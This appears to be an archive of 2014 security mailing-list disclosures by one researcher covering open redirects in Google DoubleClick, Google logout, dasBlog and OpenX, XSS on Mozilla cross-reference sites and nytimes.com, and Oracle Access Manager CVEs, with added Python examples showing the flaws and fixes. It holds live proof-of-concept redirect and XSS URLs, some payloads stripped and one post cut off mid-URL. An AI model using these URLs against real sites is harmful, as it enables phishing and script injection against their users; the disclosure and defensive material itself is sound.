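The two-hop chain described above, as an added Python example that is not part of the original post and not Google or DoubleClick code: a host-only whitelist check of the kind the post describes, a stand-in for the ad click tracker that sends the browser wherever its "adurl" parameter points, a simulated browser that follows the chain, and a hardened check that also refuses a whitelisted target whose own query string carries an absolute URL to a host outside the whitelist. The whitelist contents, the redirector table and the simplified aclk behaviour (the real URL's "ai" and "sig" values are omitted and no signature is verified) are assumptions; the inzeed.com page is the post's own stand-in for a malicious site.

```python
from urllib.parse import urlsplit, parse_qs, quote

# Assumed whitelist: the two hosts the post names as trusted by Google.
ALLOWED_HOSTS = {"docs.google.com", "googleads.g.doubleclick.net"}

# The post's stand-in for an attacker-controlled page.
ATTACKER = "http://www.inzeed.com/kaleidoscope"

# Constructed continue= value: an aclk URL whose adurl points at the attacker.
POC_CONTINUE = ("http://googleads.g.doubleclick.net/aclk?sa=L&adurl="
                + quote(ATTACKER, safe=""))


def host_allowlisted(url):
    """The check the post describes: only the hostname is compared."""
    return urlsplit(url).hostname in ALLOWED_HOSTS


def aclk_redirect(url):
    """Stand-in for the ad click tracker: it sends the browser to 'adurl'."""
    return parse_qs(urlsplit(url).query).get("adurl", [None])[0]


# Assumed model of which hosts act as redirectors and how they behave.
REDIRECTORS = {"googleads.g.doubleclick.net": aclk_redirect}


def follow_chain(start, max_hops=5):
    """Simulate a browser following the redirects; returns every URL visited."""
    chain = [start]
    for _ in range(max_hops):
        handler = REDIRECTORS.get(urlsplit(chain[-1]).hostname)
        nxt = handler(chain[-1]) if handler else None
        if nxt is None:
            break
        chain.append(nxt)
    return chain


def logout_continue(continue_url):
    """Vulnerable: any URL on a whitelisted host is accepted as-is."""
    return continue_url if host_allowlisted(continue_url) else None


def external_urls_in_query(url):
    """Query values that are themselves absolute URLs to non-whitelisted hosts."""
    found = []
    for values in parse_qs(urlsplit(url).query).values():
        for value in values:
            parts = urlsplit(value)
            if parts.scheme in ("http", "https") and parts.hostname not in ALLOWED_HOSTS:
                found.append(value)
    return found


def logout_continue_hardened(continue_url):
    """Hardened (heuristic): whitelisted host AND no embedded outbound URL.
    A stricter design whitelists exact paths or signs the continue value."""
    if not host_allowlisted(continue_url):
        return None
    if external_urls_in_query(continue_url):
        return None
    return continue_url


if __name__ == "__main__":
    accepted = logout_continue(POC_CONTINUE)
    print("whitelist accepts the POC:", accepted is not None)
    print("browser ends at:", follow_chain(accepted)[-1])
    print("hardened check accepts the POC:", logout_continue_hardened(POC_CONTINUE) is not None)
```

The heuristic in logout_continue_hardened only catches an outbound URL that appears in plain form in the query string; a redirector that takes an encoded or encrypted destination would not be caught, which is why a host-level whitelist should not include hosts that are themselves redirectors.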




(2) The following tests use one web page, http://www.inzeed.com/kaleidoscope,
which we treat as if it were malicious.



Vulnerable URL:
https://www.google.com/accounts/Logout?service=writely&continue=https://google.com/



POC:
https://www.google.com/accounts/Logout?service=wise&continue=http%3A%2F%2Fgoogleads.g.doubleclick.net%2Faclk%3Fsa%3DL%26ai%3DCtHoIVxn3UvjLOYGKiAeelIHIBfLQnccEAAAQASAAUNTx5Pf4_wFgvwWCARdjYS1wdWItMDQ2NjU4MjEwOTU2NjUzMsgBBOACAKgDAaoE5AFP0NHr5cHwFmWgKNs6HNTPVk7TWSV-CDHX83dKdGSWJ2ADoZNIxUHZwjAODRyDY_7nVtpuqSLOTef4xzVxDQ2U22MNbGak33Ur7i2jDB8LdYt9TbC3ifsXmklY5jl3Zpq4_lP7wagVfjt0--tNPPGTR96NGbxgPvfHMq9ZsTXpjhc_lPlnyGjlWzF8yn437iaxhGRwYLt_CymifLO2YaJPkCm9nLpONtUM-mstUSpKQrP2VjjaZkbDtuK0naLLBV37aYEY4TzWQi8fQGN47z4XgpinBCna91zQayZjn2wxccDCl0zgBAGgBhU%26num%3D0%26sig%3DAOD64_3Qi4qG3CRVHRI5AHSkSGuL7HJqSA%26client%3Dca-pub-0466582109566532%26adurl%3Dhttp%3A%2F%2Fwww.inzeed.com%2Fkaleidoscope



POC Video:
https://www.youtube.com/watch?v=btuSq89khcQ&feature=youtu.be



Reporter:
Wang Jing, Mathematics, Nanyang Technological University
http://www.tetraph.com/wangjing





More Details:
http://computerobsess.blogspot.com/2014/11/google-covert-redirect-vulnerability.html



[FD] Google DoubleClick.net(Advertising) System URL Redirection Vulnerabilities Can be Used by Spammers

2014-11-14 Thread Jing Wang
Google DoubleClick.net(Advertising) System URL Redirection Vulnerabilities
Can be Used by Spammers



Although Google does not include Open Redirect vulnerabilities in its bug
bounty program, its preventive measures against Open Redirect attacks have
been quite thorough and effective to date.

However, Google appears to have overlooked the security of its DoubleClick.net
advertising system. Testing found that most of the redirection URLs within
DoubleClick.net are vulnerable to Open Redirect, so many redirections are
likely to be affected.

These redirections can easily be used by spammers, too.

Some URLs belonging to Googleads.g.Doubleclick.net are vulnerable to Open
Redirect attacks as well, while Google blocks similar URL redirections to
hosts other than Googleads.g.Doubleclick.net. Attackers can use URLs related
to Google Accounts to make the attacks more powerful.

Moreover, these vulnerabilities can be used to attack other companies such
as Google, eBay and The New York Times, e.g. by bypassing their Open Redirect
filters (Covert Redirect).




*(1) Background Related to Google DoubleClick.net.*



*(1.1) What is DoubleClick.net?*

"DoubleClick is the ad technology foundation to create, transact, and
manage digital advertising for the world's buyers, creators and sellers."
http://www.google.com.sg/doubleclick/



*(1.2) Reports Related to Google DoubleClick.net Used by Spammers*


*(1.2.1)*

Google DoubleClick.net has been used by spammers for a long time. The
following is a report from 2008.

"The open redirect had become popular with spammers trying to lure users
into clicking their links, as they could be made to look like safe URLs
within Google's domain."
https://www.virusbtn.com/blog/2008/06_03a.xml?comments


*(1.2.2)*

Mitechmate published a blog related to DoubleClick.net spams in 2014.

"Ad.doubleclick.net is recognized as a perilous adware application that
causes unwanted redirections when surfing on the certain webpages. Actually
it is another browser hijacker that aims to distribute frauds to make money.
Commonly people pick up Ad.doubleclick virus when download softwares, browse
porn site or read spam email attachments. It enters into computer sneakily
after using computer insecurely. Ad.doubleclick.net is not just annoying,
this malware traces users’ personal information, which would be utilized for
cyber criminal."
http://blog.mitechmate.com/remove-ad-doubleclick-net-redirect-virus/


*(1.2.3)*

Malwarebytes posted a news related to DoubleClick.net malvertising in 2014.

"Large malvertising campaign under way involving DoubleClick and Zedo"
https://blog.malwarebytes.org/malvertising-2/2014/09/large-malvertising-campaign-under-way-involving-doubleclick-and-zedo/




*(2) DoubleClick.net System URL Redirection Vulnerabilities Details.*

These vulnerabilities can be exploited without logging in. Tests were
performed on Firefox (26.0) on Ubuntu (12.04) and IE (9.0.15) on Windows 7.

The following tests use one web page, http://www.tetraph.com/security, which
we treat as if it were malicious.



*(2.1) Vulnerable URLs Related to Googleads.g.Doubleclick.net.*


*(2.1.1)*

Some URLs belonging to googleads.g.doubleclick.net are vulnerable to Open
Redirect attacks, while Google blocks similar URL redirections to hosts other
than googleads.g.doubleclick.net.


Vulnerable URLs:
http://googleads.g.doubleclick.net/aclk?sa=L&ai=CWEQH6Q73UqW9CMvMigfdiIGoB9rlksIEAAAQASAAUO7kr-b8_wFgvwWCARdjYS1wdWItMDQ2NjU4MjEwOTU2NjUzMsgBBOACAKgDAaoEggFP0E-9agyjXkIfjOxmtpPE76hNCBn1in_meKMn53O-8ZFlbxWDgYdaVZQKJza8mIRXw22hWIVMAOJJzq-S6AipWHe9iVZCAAlcHj-gT2B33tD9a2oQrZ61S3-WFh_8T8RFUFnC_PRC35CTFbueQrUYjC-j6ncVXzt_IPXugo5vE-3x4AQBoAYV&num=0&sig=AOD64_2petJH0A9Zjj45GN117ocBukiroA&client=ca-pub-0466582109566532&adurl=http://www.sharp-world.com/igzo

http://googleads.g.doubleclick.net/aclk?sa=L&ai=C-RHnNvn2Uom8LeTaigfjkIHICfLQnccEAAAQASAAUNTx5Pf4_wFgvwWCARdjYS1wdWItMDQ2NjU4MjEwOTU2NjUzMsgBBOACAKgDAaoEhQFP0LHofgVzg8U9Bvwu2_hN9Ow0n2tBH9xjKtngqcF6hgGQpxV6QzMgNxx0_UawPG3-UD097GLLCirbVMl2QxQqa04U3cp4YFgV5dshYbzmqlVVfNn-NuunzLNab6ATE5BUwQ9bgXBOW_qEz8qgbwVOvUJrn1IzL-ymANaKsQLZ9POlkbIe4AQBoAYV&num=0&sig=AOD64_3a3m_P_9GRVFc6UIGvnornMcLMoQ&client=ca-pub-0466582109566532&adurl=http://economics.wj.com


POC:
http://googleads.g.doubleclick.net/aclk?sa=L&ai=CWEQH6Q73UqW9CMvMigfdiIGoB9rlksIEAAAQASAAUO7kr-b8_wFgvwWCARdjYS1wdWItMDQ2NjU4MjEwOTU2NjUzMsgBBOACAKgDAaoEggFP0E-9agyjXkIfjOxmtpPE76hNCBn1in_meKMn53O-8ZFlbxWDgYdaVZQKJza8mIRXw22hWIVMAOJJzq-S6AipWHe9iVZCAAlcHj-gT2B33tD9a2oQrZ61S3-WFh_8T8RFUFnC_PRC35CTFbueQrUYjC-j6ncVXzt_IPXugo5vE-3x4AQBoAYV&num=0&sig=AOD64_2petJH0A9Zjj45GN117ocBukiroA&client=ca-pub-0466582109566532&adurl=http://www.tetraph.com/security

http://googleads.g.

[FD] Mozilla mozilla.org Two Sub-Domains ( Cross Reference) XSS Vulnerability ( All URLs Under the Two Domains)

2014-10-19 Thread Jing Wang
Domains:
http://lxr.mozilla.org/
http://mxr.mozilla.org/
(The two domains above are almost the same)




Websites information:
lxr.mozilla.org, mxr.mozilla.org are cross references designed to display
the Mozilla source code. The sources displayed are those that are currently
checked in to the mainline of the mozilla.org CVS server, Mercurial Server,
and Subversion Server; these pages are updated many times a day, so they
should be pretty close to the latest‑and‑greatest. (from Mozilla)




Vulnerability description:
All pages under the following two URLs are vulnerable.
http://lxr.mozilla.org/mozilla-central/source
http://mxr.mozilla.org/mozilla-central/source


This means all URLs under the above two paths can be used for XSS attacks
targeting Mozilla's users.

Because there are a large number of pages under them, and the contents of the
two domains vary, the vulnerability is particularly dangerous: attackers can
pick different URLs to tailor XSS attacks to Mozilla's different classes of
users.

The vulnerability has been reported to bugzilla.mozilla.org. Mozilla is
dealing with this issue.




POCs:
http://lxr.mozilla.org/mozilla-central/source/
http://lxr.mozilla.org/mozilla-central/source/mobile/android/
http://lxr.mozilla.org/mozilla-central/source/Android.mk/
http://lxr.mozilla.org/mozilla-central/source/storage/public/mozIStorageBindingParamsArray.idl/
http://lxr.mozilla.org/mozilla-central/source/netwerk/protocol/device/AndroidCaptureProvider.cpp


http://mxr.mozilla.org/mozilla-central/source/
http://mxr.mozilla.org/mozilla-central/source/webapprt/
http://mxr.mozilla.org/mozilla-central/source/mozilla-config.h.in/
http://mxr.mozilla.org/mozilla-central/source/chrome/nsChromeProtocolHandler.h/
http://mxr.mozilla.org/mozilla-central/source/security/sandbox/linux/x86_32_linux_syscalls.h/




POC Video:
https://www.youtube.com/user/tetraph




Vulnerability Analysis:
Take the following link as an example,
http://lxr.mozilla.org/mozilla-central/source/chrome/

We can see that the reflected page contains the following code.




If we insert "" into the URL, the code is executed.




The vulnerability can be exploited without logging in. My tests were
performed on Firefox (26.0) on Ubuntu (12.04) and IE (9.0.15) on Windows 7.


Cross-site scripting (XSS) is a type of computer security vulnerability
typically found in Web applications. XSS enables attackers to inject
client-side script into Web pages viewed by other users. A cross-site
scripting vulnerability may be used by attackers to bypass access controls
such as the same origin policy. (From Wikipedia)




Posted By:
Wang Jing, mathematics student from Nanyang Technological University,
Singapore.
http://tetraph.com/wangjing/




More Details:
http://www.tetraph.com/blog/xss-vulnerability/mozilla-mozilla-org-two-sub-domains-cross-reference-xss-vulnerability-all-urls-under-the-two-domains/
http://lxr.mozilla.org/mozilla-central/source
http://mxr.mozilla.org/mozilla-central/source


[FD] CVE-2014-7292 Newtelligence dasBlog Open Redirect Vulnerability

2014-10-19 Thread Jing Wang
Exploit Title: Newtelligence dasBlog Open Redirect Vulnerability
Product: dasBlog
Vendor: Newtelligence
Vulnerable Versions: 2.3 (2.3.9074.18820), 2.2 (2.2.8279.16125),
2.1 (2.1.8102.813)
Tested Version: 2.3 (2.3.9074.18820)
Advisory Publication: OCT 15, 2014
Latest Update: OCT 15, 2014
Vulnerability Type: Open Redirect [CWE-601]
CVE Reference: CVE-2014-7292
Risk Level: Low
CVSSv2 Base Score: 2.6 (AV:N/AC:H/Au:N/C:N/I:P/A:N)
Credit: Wang Jing [Mathematics, Nanyang Technological University, Singapore]




Advisory Details:

Newtelligence dasBlog ct.ashx is vulnerable to Open Redirect attacks.


dasBlog supports a feature called Click-Through which basically tracks all
links clicked inside your blog posts. It's a nice feature that allows the
blogger to stay informed what kind of content readers like. If
Click-Through is turned on, all URLs inside blog entries will be replaced
with /ct.ashx?id=&url= which of course breaks WebSnapr previews.


Web.config code:



(1) The vulnerability occurs on the "ct.ashx" page, in the "url" parameter.



Solutions:
2014-10-15 Public disclosure with self-written patch.




References:
http://www.tetraph.com/blog/cves/cve-2014-7292-newtelligence-dasblog-open-redirect-vulnerability/
https://searchcode.com/codesearch/view/8710666/
https://www.microsoft.com/web/gallery/dasblog.aspx
https://dasblog.codeplex.com/releases/view/86033
http://cwe.mitre.org
http://cve.mitre.org/



[FD] New York Times nytimes.com Page Design XSS Vulnerability (Almost all Article Pages Before 2013 are Affected)

2014-10-15 Thread Jing Wang
New York Times nytimes.com Page Design XSS Vulnerability (Almost all
Article Pages Before 2013 are Affected)


Domain:
http://www.nytimes.com/



Vulnerability Description:
The vulnerability occurs in the New York Times's URLs. Nytimes (short for New
York Times) uses part of the URL to construct its pages; however, it seems
that before 2013 Nytimes did not filter the content used for that
construction at all.

Because of Nytimes's page design, almost all URLs from before 2013 are
affected (all article pages). In fact, every article page that contains a
"PRINT" button, "SINGLE PAGE" button, "Page *" button or "NEXT PAGE" button
is affected.

Nytimes changed this mechanism in 2013: it now decodes the URLs sent to its
server, which makes the mechanism much safer.

However, all URLs from before 2013 still use the old mechanism, which means
almost all article pages from before 2013 are still vulnerable to XSS
attacks. I guess the reason Nytimes has not filtered the older URLs is cost:
it would cost too much (money and human capital) to change the database of
all previously posted articles.




Living POCs:
http://www.nytimes.com/2012/02/12/sunday-review/big-datas-impact-in-the-world.html/“>
http://www.nytimes.com/2011/01/09/travel/09where-to-go.html/“>?pagewanted=all&_r=0
http://www.nytimes.com/2010/12/07/opinion/07brooks.html/“>
http://www.nytimes.com/2009/08/06/technology/06stats.html/“>
http://www.nytimes.com/2008/07/09/dining/091crex.html/“>
http://www.nytimes.com/2007/11/14/opinion/lweb14brain.html/“>




POC Video:
https://www.youtube.com/user/tetraph




Vulnerability Analysis:
Take the following link as an example,
http://www.nytimes.com/2012/02/12/sunday-review/big-datas-impact-in-the-world.html/
“>

The page's navigation links (Print, Single Page, 2, 3, Next Page ») each
build their href from the request URL, so the string appended to the URL
above is reflected into every one of them.





The vulnerability can be exploited without logging in. Tests were performed
on Firefox (26.0) on Ubuntu (12.04) and IE (9.0.15) on Windows 7.
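The pattern shared by the three reflected-XSS posts on this page (weather.com, lxr/mxr.mozilla.org and nytimes.com: the request URL spliced into tag attributes without encoding), as an added Python example that is not code from any of those sites or from the original posts. The navigation labels, the request paths and the output-encoding fix are constructed for the example; the parsed-tag check stands in for what a browser would do with the markup.

```python
import html
from html.parser import HTMLParser
from urllib.parse import quote

# Constructed request paths (modelled on the nytimes POCs, not copied from them).
BENIGN_PATH = "/2012/02/12/sunday-review/big-datas-impact-in-the-world.html"
HOSTILE_PATH = BENIGN_PATH + '/"><script>alert(1)</script>'

# Constructed navigation links of the kind the nytimes post describes.
NAV = [("Print", "pagewanted=print"),
       ("Single Page", "pagewanted=all"),
       ("Next Page", "pagewanted=2")]


def render_nav_unsafe(request_path):
    """The flaw the posts describe: the raw request path goes straight
    into each href attribute, so a quote in the path ends the attribute."""
    return "\n".join(
        f'<a href="{request_path}?{query}">{label}</a>' for label, query in NAV)


def render_nav_safe(request_path):
    """Encode for both contexts the value passes through: first as a URL
    path component (quote), then as an HTML attribute value (escape).
    quote() alone already removes <, > and " from the path; escape() keeps
    the attribute safe for any character quote() deliberately leaves alone."""
    url_path = quote(request_path, safe="/")
    return "\n".join(
        f'<a href="{html.escape(url_path, quote=True)}?{query}">{html.escape(label)}</a>'
        for label, query in NAV)


class _TagCollector(HTMLParser):
    """Records the start tags a parser sees, as a stand-in for the browser."""

    def __init__(self):
        super().__init__()
        self.tags = []

    def handle_starttag(self, tag, attrs):
        self.tags.append(tag)


def rendered_tags(markup):
    """Tag names a browser-like parser would create from the markup."""
    collector = _TagCollector()
    collector.feed(markup)
    return collector.tags


def injects_script(markup):
    """True when the markup parses into a <script> element."""
    return "script" in rendered_tags(markup)


if __name__ == "__main__":
    print("unsafe render, hostile path -> script element:",
          injects_script(render_nav_unsafe(HOSTILE_PATH)))
    print("safe render,   hostile path -> script element:",
          injects_script(render_nav_safe(HOSTILE_PATH)))
    print(render_nav_safe(HOSTILE_PATH).splitlines()[0])
```

The nytimes post says the site now decodes the URLs it receives; decoding on the way in is not the same as encoding on the way out, and only the latter (quote for the URL context, escape for the attribute context) removes the attribute break-out regardless of how the path arrived.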





Cross-site scripting (XSS) is a type of computer security vulnerability
typically found in Web applications. XSS enables attackers to inject
client-side script into Web pages viewed by other users. A cross-site
scripting vulnerability may be used by attackers to bypass access controls
such as the same origin policy.





Reported By:
Wang Jing, mathematics student from Nanyang Technological University,
Singapore.
http://tetraph.com/wangjing/




More Details:
http://www.tetraph.com/blog/xss-vulnerability/new-york-times-nytimes-com-page-design-xss-vulnerability-almost-all-article-pages-are-affected/


[FD] CVE-2014-2230 - OpenX Open Redirect Vulnerability

2014-10-15 Thread Jing Wang
Exploit Title: OpenX Open Redirect Vulnerability
Product: OpenX
Vendor:  OpenX
Vulnerable Versions: 2.8.10 and probably prior
Tested Version: 2.8.10
Advisory Publication: OCT 8, 2014
Latest Update:  OCT 8, 2014
Vulnerability Type: Open Redirect [CWE-601]
CVE Reference: CVE-2014-2230
Risk Level: Low
CVSSv2 Base Score: 2.6 (AV:N/AC:H/Au:N/C:N/I:P/A:N)
Solution Status: Solution Available
Credit: Wang Jing [Mathematics, Nanyang Technological University, Singapore]







Vulnerability Details:

OpenX's adclick.php and ck.php are vulnerable to Open Redirect attacks.

Source code of adclick.php (the destination is taken from the query string):
    $destination = MAX_querystringGetDestinationUrl($adId[0]);
    MAX_redirect($destination);

The "MAX_redirect" function is below; its only check is a case-insensitive
rejection of the "javascript:" and "data:" schemes, so any other URL is passed
straight to the Location header:
    function MAX_redirect($url)
    {
        if (!preg_match('/^(?:javascript|data):/i', $url)) {
            header('Location: '.$url);
            MAX_sendStatusCode(302);
        }
    }

The header() function sends the raw HTTP Location header to the client; apart
from that scheme check, the "$url" value taken from the "dest" parameter is
not validated at all.


(1) For "adclick.php", the vulnerability occurs in the "dest" parameter.


(2) "ck.php" uses the "adclick.php" code; there the vulnerability occurs in
the "_maxdest" parameter.
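The two click-tracking redirectors on this page, dasBlog's ct.ashx ("url" parameter) and OpenX's adclick.php ("dest" parameter), share one root cause: the destination arrives in the query string and is handed to the Location header after, at most, a scheme blacklist. As an added Python example that is not code from either project, the quoted MAX_redirect check is transcribed to show what it lets through, beside a parsed-hostname allowlist and a signed-destination tracker, which is the fix normally applied to a click counter because the server itself chose the destination when it rendered the link. The host name, the secret, the "sig" parameter and the sample links are constructed for the example; dasBlog's real ct.ashx has no such signature.

```python
import hashlib
import hmac
import re
from urllib.parse import urlsplit, urlencode, parse_qs

OWN_HOST = "blog.example"                       # constructed: the site serving the tracker
SECRET = b"constructed-per-deployment-secret"    # constructed; load from config in practice


def max_redirect_vulnerable(url):
    """Transcription of the quoted MAX_redirect() logic: only the
    javascript: and data: schemes are rejected; anything else becomes
    the Location header value. Returns the header pair or None."""
    if re.match(r"^(?:javascript|data):", url, re.IGNORECASE):
        return None
    return ("Location", url)


def is_local_destination(url):
    """Allowlist by parsing rather than blacklisting schemes: accept a
    site-relative path (but not //host or /\\host, which browsers treat as
    protocol-relative) or an http(s) URL whose host is exactly OWN_HOST."""
    parts = urlsplit(url)
    if not parts.scheme and not parts.netloc:
        return url.startswith("/") and url[1:2] not in ("/", "\\")
    return parts.scheme in ("http", "https") and parts.hostname == OWN_HOST


def _sign(url):
    return hmac.new(SECRET, url.encode("utf-8"), hashlib.sha256).hexdigest()


def make_tracking_link(post_id, destination):
    """Render time: the server emits the redirect link and signs the
    destination it chose, mirroring the ct.ashx?id=...&url=... shape with
    an added sig parameter (an assumption, not dasBlog's format)."""
    return "/ct.ashx?" + urlencode({"id": post_id, "url": destination,
                                    "sig": _sign(destination)})


def click_through(query_string):
    """Click time: redirect only to a destination this server signed.
    Returns the destination, or None when url or sig is missing or was
    tampered with. No URL parsing is needed, so parser quirks cannot help."""
    params = parse_qs(query_string)
    url = params.get("url", [""])[0]
    sig = params.get("sig", [""])[0]
    if not url or not hmac.compare_digest(sig.encode("utf-8"), _sign(url).encode("utf-8")):
        return None
    return url


if __name__ == "__main__":
    for candidate in ("http://attacker.example/", "//attacker.example/",
                      "JavaScript:alert(1)", "/posts/1"):
        blacklist_ok = max_redirect_vulnerable(candidate) is not None
        print(f"{candidate!r:30} blacklist passes: {blacklist_ok!s:5} "
              f"allowlist passes: {is_local_destination(candidate)}")
    link = make_tracking_link("42", "http://partner.example/page")
    print(link, "->", click_through(link.split('?', 1)[1]))
```

A tracker that must redirect off-site (an ad server's landing page, a blog's outbound links) cannot use the allowlist alone; signing the destination at render time lets it redirect anywhere it chose while refusing anything a third party substituted.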








Solutions:
2014-10-12 Public disclosure with self-written patch.


References:
https://github.com/kriwil/OpenX/blob/master/www/index.php
http://www.tetraph.com/blog/cves/cve-2014-2230-openx-open-redirect-vulnerability/
http://www.openx.com
http://cwe.mitre.org
http://cve.mitre.org/



[FD] Oracle Access Manager (OAM) Vulnerabilities (CVEs)

2014-06-10 Thread Jing Wang
Oracle Access Manager (formerly known as Oblix NetPoint and Oracle COREid)
provides a full range of identity administration and security functions,
that include Web single sign-on; user self-service and self-registration;
sophisticated workflow functionality; auditing and access reporting; policy
management; dynamic group management; and delegated administration.


The main file of OAM is "obrareq.cgi". However, the file does not validate
its parameters properly, so attackers can modify them as they like and mount
attacks.




My name is Wang Jing. I am a Mathematics PhD student at Nanyang
Technological University, Singapore. I reported the vulnerabilities to
Oracle in February 2014.

The vulnerabilities were fixed by Oracle in the following update:
http://www.oracle.com/technetwork/topics/security/cpuapr2014-1972952.html



More Details:
http://www.tetraph.com/blog/2014/06/oracle-access-manager-oam-vulnerabilities/



CVE Details:
CVE-2014-2404: http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2014-2404
CVE-2014-2452: http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2014-2452
